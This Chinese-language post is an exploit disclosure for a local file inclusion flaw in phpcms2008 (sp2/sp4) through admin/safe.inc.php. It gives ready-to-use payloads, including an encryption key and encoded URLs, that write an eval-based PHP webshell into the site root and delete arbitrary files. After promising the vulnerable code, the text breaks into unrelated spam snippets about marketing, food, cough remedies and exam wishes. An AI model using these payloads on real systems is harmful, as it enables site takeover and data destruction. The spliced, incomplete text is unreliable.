发布日期:2011-05.04
发布作者:c4rp3nt3r
影响版本:phpcms2008 sp2 or sp4
官方地址:http://www.phpcms.cn
漏洞类型:文件包含
漏洞描述:phpcms本地包含类漏洞,如果该文件包含了/include/common.inc.php就可以包含执行很多后台才能执行的文件了。
由于phpcms的全局变量机制,导致能拿shell的 *** 很多,类似的问题不止一个。
admin/safe.inc.php文件是后台扫木马的程序,但是很可惜的是虽然文件名叫做safe,但是一点也不safe。
公布一个本地包含秒杀拿shell的 *** 。
包含:admin/safe.inc.php文件GET提交一下数据
将在根目录下生成一句话
用上一篇得到的密钥$key='sIpeofogblFVCildZEwe';
加密如下字符串
$evil='i=1&m=1&f= *** &action=edit_code&file_path=evil.php&code=<?eval($_POST[a])?>&mod=../../admin/safe.inc.php%00';
http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJK *** kxHgoddBUBBhIwBA0II3AlAAAB *** UWERt0FRMGCkEXChxgNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=
将在根目录下生成一句话木马
同理任意文件删除漏洞:
$evil='i=1&m=1&f= *** &action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00';
http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJK *** kxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0 *** HhtBDwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==
参考:Flyh4t [PhpCMS]一个漏洞的二次利用
详细说明:
贴上存在漏洞的代码
SEM已成为互联网市场主流的营销模式,个中搜索推广也是今朝B2C企业最受接待最遍及的营销手段。跟着搜索引擎市场变革及需求,百度搜索,360搜索,搜狗搜索等运营商逐渐完善投放系统,按照告白主的需求,针对...
大家实际上都了解干货知识一直全是大家如今日常生活十分普遍的食材,例如像大家平时喜欢吃的南瓜子、甜杏仁这种都归属于干货知识食品类。那麼干货知识的盈利室内空间究竟有多大?卖干货知识赚钱吗?最先怎么样赚钱,...
本文目录一览: 1、黑客是什么意思 2、最著名的黑客大赛是什么? 3、有什么有名气的黑客大赛大家知道的啊? 黑客是什么意思 黑客( 大陆和香港:黑客;台湾:骇客,英文:Hacker),通常是...
干咳吃什么(咳嗽干咳吃什么好得快)咳嗽干咳平时要注意多喝水,多吃些绿叶蔬菜,尽量选择维生素c含量高的水果,可以有效缓解咳嗽的症状,并且应该要做好饮食方面的护理工作,不要吃不干净的食物,尽量选择清淡营养...
35岁的男人增加被动收入的25种方法! 一.钱生钱类 1、银行存款利息 2、民间借贷利息 二.房产类 3、自己拥有的住房、写字间、商铺等出租租金 4、自己拥有的住房、写字间、商铺以息代租,押金的钱生钱...
2020年国考就要开考了,今年又是一番“厮杀”,相信很多网友或者亲友都会参加国家公务员考试,考试就要到了,让我们发一些祝福语鼓励他们吧,为大家搜集整理的公务员考试顺利祝福语,希望大家喜欢! 东...